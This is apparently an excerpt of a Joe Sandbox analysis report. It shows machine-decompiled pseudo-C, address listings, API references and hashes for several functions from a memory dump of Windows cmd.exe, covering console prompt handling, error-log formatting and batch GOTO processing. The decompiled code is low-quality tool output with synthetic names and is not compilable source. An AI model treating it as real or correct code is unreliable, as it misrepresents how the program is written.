                                    0x011df71a
                                    0x00000000
                                    0x011df71a
                                    0x011df714
                                    0x00000000
                                    0x011df6ff
                                    0x011df4e4
                                    0x011df490
                                    0x011df3bd
                                    0x011df4ea
                                    0x011df4ed
                                    0x011df4f0
                                    0x011df4f3
                                    0x011df4f8
                                    0x011df505
                                    0x011df507
                                    0x011df507
                                    0x011df516
                                    0x011df519
                                    0x00000000
                                    0x00000000
                                    0x011df51f
                                    0x011df51f
                                    0x011df525
                                    0x011df56d
                                    0x00000000
                                    0x011df56f
                                    0x011df56f
                                    0x011df576
                                    0x00000000
                                    0x011df57d
                                    0x00000000
                                    0x00000000
                                    0x011df6be
                                    0x00000000
                                    0x00000000
                                    0x011df82c
                                    0x00000000
                                    0x00000000
                                    0x011df796
                                    0x011df796
                                    0x011df79b
                                    0x00000000
                                    0x011df7a1
                                    0x011df7a3
                                    0x011df580
                                    0x011df580
                                    0x011df583
                                    0x011df586
                                    0x011df588
                                    0x00000000
                                    0x011df58a
                                    0x00000000
                                    0x011df7a9
                                    0x011df7ad
                                    0x00000000
                                    0x011df7b3
                                    0x00000000
                                    0x011df7b3
                                    0x011df7ad
                                    0x011df7a3
                                    0x00000000
                                    0x00000000
                                    0x011df758
                                    0x011df75d
                                    0x00000000
                                    0x011df763
                                    0x011ec552
                                    0x00000000
                                    0x011ec558
                                    0x011df82f
                                    0x011df82f
                                    0x011df833
                                    0x00000000
                                    0x011df839
                                    0x00000000
                                    0x011df839
                                    0x011df833
                                    0x011ec552
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df576
                                    0x011df52c
                                    0x011df52c
                                    0x011df52c
                                    0x011df533
                                    0x011df840
                                    0x00000000
                                    0x011df846
                                    0x011df84b
                                    0x011df851
                                    0x00000000
                                    0x011df857
                                    0x011df85a
                                    0x00000000
                                    0x011df860
                                    0x011ec562
                                    0x011ec568
                                    0x00000000
                                    0x011ec56e
                                    0x00000000
                                    0x011ec56e
                                    0x011ec568
                                    0x011df85a
                                    0x011df851
                                    0x00000000
                                    0x011df539
                                    0x011df539
                                    0x011df53d
                                    0x011df671
                                    0x011df674
                                    0x011df674
                                    0x011df545
                                    0x011df58d
                                    0x011df593
                                    0x011df598
                                    0x00000000
                                    0x011df59a
                                    0x011df59e
                                    0x011df667
                                    0x011df5a4
                                    0x011df5a4
                                    0x011df5a4
                                    0x011df5ab
                                    0x011df5b1
                                    0x011df5b6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df5b6
                                    0x011df547
                                    0x011df547
                                    0x011df548
                                    0x011df54e
                                    0x011df553
                                    0x011df5fb
                                    0x011df611
                                    0x011df641
                                    0x011df646
                                    0x011df64c
                                    0x011df657
                                    0x011df65c
                                    0x00000000
                                    0x011df662
                                    0x00000000
                                    0x011df662
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df613
                                    0x011df613
                                    0x011df618
                                    0x011df61b
                                    0x011df621
                                    0x011df626
                                    0x00000000
                                    0x011df628
                                    0x011df630
                                    0x011df636
                                    0x011df63b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df63b
                                    0x011df626
                                    0x00000000
                                    0x011df559
                                    0x011df559
                                    0x011df55f
                                    0x011df5b8
                                    0x011df5b8
                                    0x011df561
                                    0x011df561
                                    0x011df564
                                    0x011df567
                                    0x00000000
                                    0x011df567
                                    0x011df55f
                                    0x011df553
                                    0x011df545
                                    0x011df533
                                    0x011df5bb
                                    0x011df5be
                                    0x011df5c3
                                    0x011df5c6
                                    0x011df5c9
                                    0x011df5ce
                                    0x011df5d0
                                    0x011df5dc
                                    0x011df5de
                                    0x011df5de
                                    0x011df5dc
                                    0x011df5e7
                                    0x011ec57b
                                    0x011ec58b
                                    0x00000000
                                    0x011ec590
                                    0x011ec57b
                                    0x011df5f8
                                    0x00000000
                                    0x011ec52a
                                    0x011ec52e
                                    0x011ec538
                                    0x00000000
                                    0x011ec53e
                                    0x011ec543
                                    0x00000000
                                    0x011ec543
                                    0x00000000
                                    0x011ec538
                                    0x011df507
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: iswspace$wcschr$iswdigit$_setjmp3
                                    • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                    • API String ID: 1805751789-2755026540
                                    • Opcode ID: d25baac2e000737c5fe1537f19ac4be1d87a99457f72269128c39179d34e263a
                                    • Instruction ID: 3b2e26927944b91f88d64370b0b0d0722f7b0f0ba93f8f8ff0ccbb8749d1bbe7
                                    • Opcode Fuzzy Hash: d25baac2e000737c5fe1537f19ac4be1d87a99457f72269128c39179d34e263a
                                    • Instruction Fuzzy Hash: F4E10675A00213AADF3D8F6DA94C3BA3BA0AF05258F594126ED47D7292E734C783C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F9583, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 247COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 59%
                                    			E011F9583(void* __ecx, intOrPtr __edx, char _a4) {
				signed int _v12;
				long _v44;
				char _v45;
				char _v46;
				long _v52;
				long _v56;
				long _v60;
				long _v64;
				intOrPtr _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				intOrPtr _t58;
				void* _t69;
				signed int _t74;
				void* _t81;
				signed int _t93;
				void _t94;
				signed int _t98;
				char _t100;
				void* _t101;
				signed int* _t105;
				intOrPtr* _t106;
				void* _t114;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				long _t128;
				void* _t130;
				wchar_t* _t131;
				long _t134;
				signed int _t135;
				void* _t136;
				void* _t137;
				void* _t138;

				_t104 = __ecx;
				_t51 =  *0x11fd0b4; // 0x2833377e
				_v12 = _t51 ^ _t135;
				_t100 = _a4;
				_t128 = 0;
				_v68 = __edx;
				_v72 = __ecx;
				_v56 = 0;
				_v45 = 0;
				_v46 = 0;
				if(__edx != 0x400023d3) {
					L5:
					_push(_t100);
					_t124 = E011DB3FC(_t104);
					_t137 = _t136 + 4;
					if(_t124 == 0) {
						L10:
						_t105 =  &_v44;
						_t120 = 0x10;
						_t130 = L"NY" - _t105;
						while(1) {
							_t12 = _t120 + 0x7fffffee; // 0x7ffffffe
							if(_t12 == 0) {
								break;
							}
							_t93 =  *(_t130 + _t105) & 0x0000ffff;
							if(_t93 == 0) {
								break;
							}
							 *_t105 = _t93;
							_t105 =  &(_t105[0]);
							_t120 = _t120 - 1;
							if(_t120 != 0) {
								continue;
							}
							L16:
							_t105 = _t105 - 2;
							L17:
							_t128 = 0;
							 *_t105 = 0;
							L18:
							_t106 =  &_v44;
							_t121 = _t106 + 2;
							do {
								_t58 =  *_t106;
								_t106 = _t106 + 2;
							} while (_t58 != 0);
							_t108 = _t106 - _t121 >> 1;
							_v80 = (_t106 - _t121 >> 1) - 1;
							LocalFree(_t124);
							_t101 = GetStdHandle(0xfffffff5);
							_v88 = _t101;
							if(GetConsoleMode(_t101,  &_v60) != 0) {
								_t108 = _v60 | 0x00000001;
								_v45 = 1;
								SetConsoleMode(_t101, _v60 | 0x00000001);
							}
							_t125 = GetStdHandle(0xfffffff6);
							_v84 = _t125;
							if(GetConsoleMode(_t125,  &_v64) != 0) {
								_t108 = _v64 | 0x00000007;
								SetConsoleMode(_t125, _v64 | 0x00000007);
								_t134 =  *0x1203888;
								if(_t134 != 0) {
									_t108 = _t134;
									 *0x12194b4(L"<noalias>");
									 *_t134();
								}
								_t128 = 0;
							}
							_t126 = _v68;
							while(1) {
								_t100 = 1;
								_v52 = 0;
								_t68 = _v72;
								if(_v72 == 0) {
									_push(0);
									_push(_t126);
									_t69 = E011DC108(_t108);
									_t138 = _t137 + 8;
								} else {
									_t69 = E011DC108(_t108, _t126, 1, _t68);
									_t138 = _t137 + 0xc;
								}
								_t108 = 0;
								if(E011E0178(_t69) != 0) {
									FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
								}
								if(_v52 == 0xa) {
									goto L45;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t81 = GetStdHandle(0xfffffff6);
									_t121 =  &_v52;
									_t108 = _t81;
									if(E011F3B11(_t81,  &_v52, 1,  &_v76) == 0 || _v76 != 1) {
										break;
									}
									if(_t100 != 0) {
										_t128 = towupper(_v52) & 0x0000ffff;
										_t138 = _t138 + 4;
										_v56 = _t128;
									}
									_t108 = 0;
									_t100 = 0;
									if(E011E0178(_t82) == 0 || ( *0x1213aa0 & 0x00000001) == 0) {
										_push(_v52 & 0x0000ffff);
										E011E25D9(L"%c");
										_t138 = _t138 + 8;
									}
									if(_v52 != 0xa) {
										continue;
									} else {
										goto L45;
									}
								}
								_t128 = _v44 & 0x0000ffff;
								_v56 = _t128;
								E011E25D9(L"\r\n");
								_t138 = _t138 + 4;
								L45:
								_t131 = wcschr( &_v44, _t128);
								_t137 = _t138 + 8;
								if(_t131 == 0) {
									L28:
									_t128 = _v56;
									continue;
								}
								_t133 = _t131 -  &_v44 >> 1;
								if(_t133 > _v80) {
									goto L28;
								}
								_t127 = _v84;
								if(_v45 != 0) {
									SetConsoleMode(_v88, _v60);
								}
								if(_t100 != 0) {
									SetConsoleMode(_t127, _v64);
									_t127 =  *0x1203888;
									if(_t127 != 0) {
										 *0x12194b4(L"CMD.EXE");
										 *_t127();
									}
								}
								_t74 = _t133;
								L53:
								return E011E6FD0(_t74, _t100, _v12 ^ _t135, _t121, _t127, _t133);
							}
						}
						if(_t120 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t114 = _t124;
					_t8 = _t114 + 2; // 0x2
					_t122 = _t8;
					do {
						_t94 =  *_t114;
						_t114 = _t114 + 2;
					} while (_t94 != 0);
					if(_t114 - _t122 >> 1 >= 0x10) {
						goto L10;
					}
					E011E1040( &_v44, 0x10, _t124);
					__imp___wcsupr( &_v44);
					_t137 = _t137 + 4;
					goto L18;
				}
				_t136 = _t136 - 8;
				_t121 = 0;
				_t127 = E011D5DB5(__ecx, 0);
				if(_t127 == 0xffffffff) {
					goto L5;
				}
				_t98 = E011E0178(_t97);
				_t104 = _t127;
				_t133 = _t98;
				E011DDB92(_t127);
				if(_t98 == 0) {
					_t128 = 0;
					goto L5;
				}
				_t74 = 2;
				goto L53;
			}















































                                    0x011f9583
                                    0x011f958b
                                    0x011f9592
                                    0x011f9596
                                    0x011f959c
                                    0x011f959e
                                    0x011f95a1
                                    0x011f95a4
                                    0x011f95a7
                                    0x011f95ab
                                    0x011f95b6
                                    0x011f95e9
                                    0x011f95e9
                                    0x011f95ef
                                    0x011f95f1
                                    0x011f95f6
                                    0x011f9634
                                    0x011f9634
                                    0x011f963e
                                    0x011f9643
                                    0x011f9645
                                    0x011f9645
                                    0x011f964d
                                    0x00000000
                                    0x00000000
                                    0x011f964f
                                    0x011f9656
                                    0x00000000
                                    0x00000000
                                    0x011f9658
                                    0x011f965b
                                    0x011f965e
                                    0x011f9661
                                    0x00000000
                                    0x00000000
                                    0x011f9669
                                    0x011f9669
                                    0x011f966c
                                    0x011f966e
                                    0x011f9670
                                    0x011f9673
                                    0x011f9673
                                    0x011f9676
                                    0x011f9679
                                    0x011f9679
                                    0x011f967c
                                    0x011f967f
                                    0x011f9686
                                    0x011f968c
                                    0x011f968f
                                    0x011f969d
                                    0x011f96a4
                                    0x011f96af
                                    0x011f96b4
                                    0x011f96b7
                                    0x011f96bd
                                    0x011f96bd
                                    0x011f96cb
                                    0x011f96d2
                                    0x011f96dd
                                    0x011f96e4
                                    0x011f96e9
                                    0x011f96ef
                                    0x011f96f7
                                    0x011f96fe
                                    0x011f9700
                                    0x011f9706
                                    0x011f9706
                                    0x011f9708
                                    0x011f9708
                                    0x011f970f
                                    0x011f9717
                                    0x011f9719
                                    0x011f971b
                                    0x011f971f
                                    0x011f9724
                                    0x011f9734
                                    0x011f9736
                                    0x011f9737
                                    0x011f973c
                                    0x011f9726
                                    0x011f972a
                                    0x011f972f
                                    0x011f972f
                                    0x011f973f
                                    0x011f9748
                                    0x011f9753
                                    0x011f9753
                                    0x011f975e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f9764
                                    0x011f9764
                                    0x011f976c
                                    0x011f9772
                                    0x011f9775
                                    0x011f977e
                                    0x00000000
                                    0x00000000
                                    0x011f9788
                                    0x011f9793
                                    0x011f9796
                                    0x011f9799
                                    0x011f9799
                                    0x011f979c
                                    0x011f979e
                                    0x011f97a7
                                    0x011f97b6
                                    0x011f97bc
                                    0x011f97c1
                                    0x011f97c1
                                    0x011f97c9
                                    0x00000000
                                    0x011f97cb
                                    0x00000000
                                    0x011f97cb
                                    0x011f97c9
                                    0x011f97cd
                                    0x011f97d6
                                    0x011f97d9
                                    0x011f97de
                                    0x011f97e1
                                    0x011f97ec
                                    0x011f97ee
                                    0x011f97f3
                                    0x011f9714
                                    0x011f9714
                                    0x00000000
                                    0x011f9714
                                    0x011f97fe
                                    0x011f9803
                                    0x00000000
                                    0x00000000
                                    0x011f980d
                                    0x011f9810
                                    0x011f9818
                                    0x011f9818
                                    0x011f9820
                                    0x011f9826
                                    0x011f982c
                                    0x011f9834
                                    0x011f983d
                                    0x011f9843
                                    0x011f9843
                                    0x011f9834
                                    0x011f9845
                                    0x011f9847
                                    0x011f9857
                                    0x011f9857
                                    0x011f9717
                                    0x011f9667
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f9667
                                    0x011f95f8
                                    0x011f95fa
                                    0x011f95fa
                                    0x011f9603
                                    0x011f9603
                                    0x011f9606
                                    0x011f9609
                                    0x011f9615
                                    0x00000000
                                    0x00000000
                                    0x011f9620
                                    0x011f9629
                                    0x011f962f
                                    0x00000000
                                    0x011f962f
                                    0x011f95b8
                                    0x011f95bb
                                    0x011f95c2
                                    0x011f95c7
                                    0x00000000
                                    0x00000000
                                    0x011f95cb
                                    0x011f95d0
                                    0x011f95d2
                                    0x011f95d4
                                    0x011f95db
                                    0x011f95e7
                                    0x00000000
                                    0x011f95e7
                                    0x011f95dd
                                    0x00000000

                                    APIs
                                    • _wcsupr.MSVCRT ref: 011F9629
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 011F968F
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F9697
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96A7
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96BD
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F96C5
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96D5
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96E9
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F974C
                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 011F9753
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 011F976C
                                    • towupper.MSVCRT ref: 011F978D
                                    • wcschr.MSVCRT ref: 011F97E6
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F9818
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F9826
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                    • String ID: <noalias>$CMD.EXE
                                    • API String ID: 2015057810-1690691951
                                    • Opcode ID: 9ebae59d47204f767e2cc653ff14754d2f9e49e39fdf8f7df4d46377846410a5
                                    • Instruction ID: 60a33344397155c4b31afdd1e785ca39ac74416fc1a4e70281673e98e544ff37
                                    • Opcode Fuzzy Hash: 9ebae59d47204f767e2cc653ff14754d2f9e49e39fdf8f7df4d46377846410a5
                                    • Instruction Fuzzy Hash: 5F81DA71E002189BDF28EFB8D858BEE7BB5AF55618F08021DFE02A7284DB719945CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F1C79, Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 166windowthreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 23%
                                    			E011F1C79(signed short* __ecx, signed int __edx, intOrPtr* _a4) {
				signed int _v8;
				short _v520;
				char* _v524;
				signed int _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t45;
				signed short* _t50;
				void* _t53;
				void* _t54;
				signed short* _t58;
				void* _t59;
				void* _t60;
				signed short* _t65;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				signed int _t78;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;

				_t73 = __edx;
				_t39 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t39 ^ _t78;
				_t65 = __ecx;
				_v528 = __edx;
				_t77 = _a4;
				if(__edx == 0 || __ecx == 0) {
					L31:
					return E011E6FD0(0, _t65, _v8 ^ _t78, _t73, _t74, _t77);
				} else {
					_push(_t74);
					_t75 =  *0x121807c;
					 *__ecx = 0;
					if(_t75 == 0 ||  *0x1218081 == 0) {
						L5:
						_v524 = 0x11d30d8;
						_t45 =  *_t77;
						if(_t45 == 0) {
							_v524 = "Exception";
						} else {
							_t59 = _t45 - 1;
							if(_t59 == 0) {
								_v524 = "ReturnHr";
							} else {
								_t60 = _t59 - 1;
								if(_t60 == 0) {
									_v524 = "LogHr";
								} else {
									if(_t60 == 1) {
										_v524 = "FailFast";
									}
								}
							}
						}
						_v520 = 0;
						FormatMessageW(0x1200, 0,  *(_t77 + 4), 0x400,  &_v520, 0x100, 0);
						_push( *((intOrPtr*)(_t77 + 0x48)));
						_push( *((intOrPtr*)(_t77 + 0x44)));
						_t76 = _t65 + _v528 * 2;
						if( *((intOrPtr*)(_t77 + 0x1c)) == 0) {
							_push(L"%hs!%p: ");
							_push(_t76);
							_push(_t65);
							_t50 = E011F24CB();
							_t80 = _t79 + 0x14;
						} else {
							_push( *((intOrPtr*)(_t77 + 0x20)));
							_t50 = E011F24CB(_t65, _t76, L"%hs(%d)\\%hs!%p: ",  *((intOrPtr*)(_t77 + 0x1c)));
							_t80 = _t79 + 0x1c;
						}
						_t65 = _t50;
						if( *((intOrPtr*)(_t77 + 0x4c)) != 0) {
							_t58 = E011F24CB(_t65, _t76, L"(caller: %p) ",  *((intOrPtr*)(_t77 + 0x4c)));
							_t80 = _t80 + 0x10;
							_t65 = _t58;
						}
						_push( &_v520);
						_push( *(_t77 + 4));
						_push(GetCurrentThreadId());
						_push( *((intOrPtr*)(_t77 + 0x24)));
						_t53 = E011F24CB(_t65, _t76, L"%hs(%d) tid(%x) %08X %ws", _v524);
						_t81 = _t80 + 0x20;
						if( *((intOrPtr*)(_t77 + 0xc)) != 0 ||  *((intOrPtr*)(_t77 + 0x28)) != 0 ||  *((intOrPtr*)(_t77 + 0x18)) != 0) {
							_push(L"    ");
							_push(_t76);
							_push(_t53);
							_t54 = E011F24CB();
							_t82 = _t81 + 0xc;
							if( *((intOrPtr*)(_t77 + 0xc)) != 0) {
								_t54 = E011F24CB(_t54, _t76, L"Msg:[%ws] ",  *((intOrPtr*)(_t77 + 0xc)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x28)) != 0) {
								_t54 = E011F24CB(_t54, _t76, L"CallContext:[%hs] ",  *((intOrPtr*)(_t77 + 0x28)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x14)) == 0) {
								if( *((intOrPtr*)(_t77 + 0x18)) == 0) {
									_push("\n");
									_push(_t76);
									_push(_t54);
									E011F24CB();
								} else {
									E011F24CB(_t54, _t76, L"[%hs]\n",  *((intOrPtr*)(_t77 + 0x18)));
								}
							} else {
								_push( *((intOrPtr*)(_t77 + 0x14)));
								E011F24CB(_t54, _t76, L"[%hs(%hs)]\n",  *((intOrPtr*)(_t77 + 0x18)));
							}
						}
						goto L30;
					} else {
						 *0x12194b4(_t77, __ecx, __edx);
						 *_t75();
						if(( *__ecx & 0x0000ffff) != 0) {
							L30:
							_pop(_t74);
							goto L31;
						}
						goto L5;
					}
				}
			}




























                                    0x011f1c79
                                    0x011f1c84
                                    0x011f1c8b
                                    0x011f1c91
                                    0x011f1c93
                                    0x011f1c9a
                                    0x011f1c9f
                                    0x011f1e72
                                    0x011f1e83
                                    0x011f1cad
                                    0x011f1cad
                                    0x011f1cae
                                    0x011f1cb6
                                    0x011f1cbb
                                    0x011f1cde
                                    0x011f1ce2
                                    0x011f1cec
                                    0x011f1cee
                                    0x011f1d23
                                    0x011f1cf0
                                    0x011f1cf0
                                    0x011f1cf3
                                    0x011f1d17
                                    0x011f1cf5
                                    0x011f1cf5
                                    0x011f1cf8
                                    0x011f1d0b
                                    0x011f1cfa
                                    0x011f1cfd
                                    0x011f1cff
                                    0x011f1cff
                                    0x011f1cfd
                                    0x011f1cf8
                                    0x011f1cf3
                                    0x011f1d35
                                    0x011f1d51
                                    0x011f1d61
                                    0x011f1d64
                                    0x011f1d67
                                    0x011f1d6a
                                    0x011f1d83
                                    0x011f1d88
                                    0x011f1d89
                                    0x011f1d8a
                                    0x011f1d8f
                                    0x011f1d6c
                                    0x011f1d6c
                                    0x011f1d79
                                    0x011f1d7e
                                    0x011f1d7e
                                    0x011f1d96
                                    0x011f1d98
                                    0x011f1da4
                                    0x011f1da9
                                    0x011f1dac
                                    0x011f1dac
                                    0x011f1db4
                                    0x011f1db5
                                    0x011f1dbe
                                    0x011f1dbf
                                    0x011f1dcf
                                    0x011f1dd6
                                    0x011f1ddc
                                    0x011f1dec
                                    0x011f1df1
                                    0x011f1df2
                                    0x011f1df3
                                    0x011f1df8
                                    0x011f1dff
                                    0x011f1e0b
                                    0x011f1e10
                                    0x011f1e10
                                    0x011f1e17
                                    0x011f1e23
                                    0x011f1e28
                                    0x011f1e28
                                    0x011f1e2f
                                    0x011f1e4c
                                    0x011f1e62
                                    0x011f1e67
                                    0x011f1e68
                                    0x011f1e69
                                    0x011f1e4e
                                    0x011f1e58
                                    0x011f1e5d
                                    0x011f1e31
                                    0x011f1e31
                                    0x011f1e3e
                                    0x011f1e43
                                    0x011f1e2f
                                    0x00000000
                                    0x011f1cc5
                                    0x011f1cca
                                    0x011f1cd0
                                    0x011f1cd8
                                    0x011f1e71
                                    0x011f1e71
                                    0x00000000
                                    0x011f1e71
                                    0x00000000
                                    0x011f1cd8
                                    0x011f1cbb

                                    APIs
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,00000000), ref: 011F1D51
                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 011F1DB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CurrentFormatMessageThread
                                    • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                    • API String ID: 2411632146-2849347638
                                    • Opcode ID: 3f9c48d63387b4ee8cca38820414baae4e9395b5b24790d64c523bdc13b3a5f0
                                    • Instruction ID: 11ef462c5647e08d3f75faa70b0c3cdbd028b8f7b44a4285ebacfc2e7a8eb1e1
                                    • Opcode Fuzzy Hash: 3f9c48d63387b4ee8cca38820414baae4e9395b5b24790d64c523bdc13b3a5f0
                                    • Instruction Fuzzy Hash: F15122B1900711FBEB3DAF699C08EABBBB8EB54300F00455DF32A92552D7719980CB22
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DE560, Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 306COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E011DE560(struct HINSTANCE__** __ecx, struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v24;
				int _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v48;
				struct HINSTANCE__* _v552;
				struct HINSTANCE__* _v556;
				struct HINSTANCE__* _v560;
				struct HINSTANCE__* _v564;
				struct HINSTANCE__* _v568;
				intOrPtr _v572;
				void* _v576;
				void* _v580;
				void* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t67;
				struct HINSTANCE__* _t71;
				struct HINSTANCE__* _t72;
				struct HINSTANCE__ _t74;
				int _t77;
				int _t82;
				struct HINSTANCE__* _t84;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t92;
				void* _t93;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t95;
				struct HINSTANCE__* _t96;
				struct HINSTANCE__* _t108;
				struct HINSTANCE__** _t111;
				void* _t112;
				struct HINSTANCE__* _t118;
				struct HINSTANCE__ _t124;
				struct HINSTANCE__* _t143;
				void* _t144;
				struct HINSTANCE__* _t145;
				struct HINSTANCE__* _t147;
				void* _t148;
				struct HINSTANCE__* _t149;
				signed int _t150;
				signed int _t152;
				void* _t153;

				_t136 = __edx;
				_t152 = (_t150 & 0xfffffff8) - 0x234;
				_t60 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t60 ^ _t152;
				_t111 = __ecx;
				_v556 = __edx;
				_t147 = 0;
				_t143 = 1;
				_v564 = 0;
				_v560 = 1;
				_v552 = 0;
				if( *0x1213cc4 != __ecx) {
					L79:
					_t63 = _t147;
					goto L33;
				} else {
					L2:
					while(1) {
						if( *0x11fd544 != 0) {
							E011F921A(_t111, _t143);
							_t136 = _v556;
						}
						 *0x11fd590 = 0;
						if( *0x1213cc9 == 0 || _t143 == 0) {
							L5:
							_t145 = E011E0662(_t111);
							if(_t145 == 0xffffffff) {
								goto L74;
							}
							_t67 = E011DEEF0(3, _t145, _t111[4]);
							_t147 = _t67;
							__imp___tell(_t145);
							_t111[2] = _t67;
							_t153 = _t152 + 4;
							_t8 = _t145 - 3; // -3
							_t118 = 0;
							_t136 = _t145;
							if(_t8 > 0x5b) {
								L9:
								__imp___close(_t145);
								_t152 = _t153 + 4;
								if(_t147 == 0) {
									goto L42;
								}
								if(_t147 == 1 ||  *0x120f980 == 0x234a) {
									E011F82EB(_t118);
									__eflags =  *0x11fd0c8 - 1;
									if( *0x11fd0c8 == 1) {
										__eflags =  *0x1218530;
										if( *0x1218530 == 0) {
											E011F6FF0(_t118);
											E011DC108(_t118, 0x2371, 1, 0x1203892);
											_t152 = _t152 + 0xc;
										}
									}
									E011F9287(_t118);
									__imp__longjmp(0x120b8b8, 1);
									goto L79;
								} else {
									if(_t147 == 0xffffffff) {
										_t63 = _v564;
										goto L33;
									} else {
										_t143 = _v560;
										_t136 = _v552;
										goto L14;
									}
								}
							}
							if(_t145 > 0x1f) {
								_t49 = _t145 - 0x20; // -32
								_t108 = 1 + (_t49 >> 5);
								__eflags = _t108;
								_t118 = _t108;
								do {
									_t136 = _t136 - 0x20;
									_t108 = _t108 - 1;
									__eflags = _t108;
								} while (_t108 != 0);
							}
							asm("btr eax, edx");
							goto L9;
						} else {
							__eflags =  *((short*)( *((intOrPtr*)(_t136 + 0x38)))) - 0x3a;
							if( *((short*)( *((intOrPtr*)(_t136 + 0x38)))) != 0x3a) {
								goto L5;
							}
							_t147 = E011E00B0(0x50);
							__eflags = _t147;
							if(_t147 == 0) {
								L74:
								_t63 = 1;
								L33:
								_pop(_t144);
								_pop(_t148);
								_pop(_t112);
								__eflags = _v8 ^ _t152;
								return E011E6FD0(_t63, _t112, _v8 ^ _t152, _t136, _t144, _t148);
							}
							_t147->i = 0;
							_t71 = E011DDF40(L"GOTO");
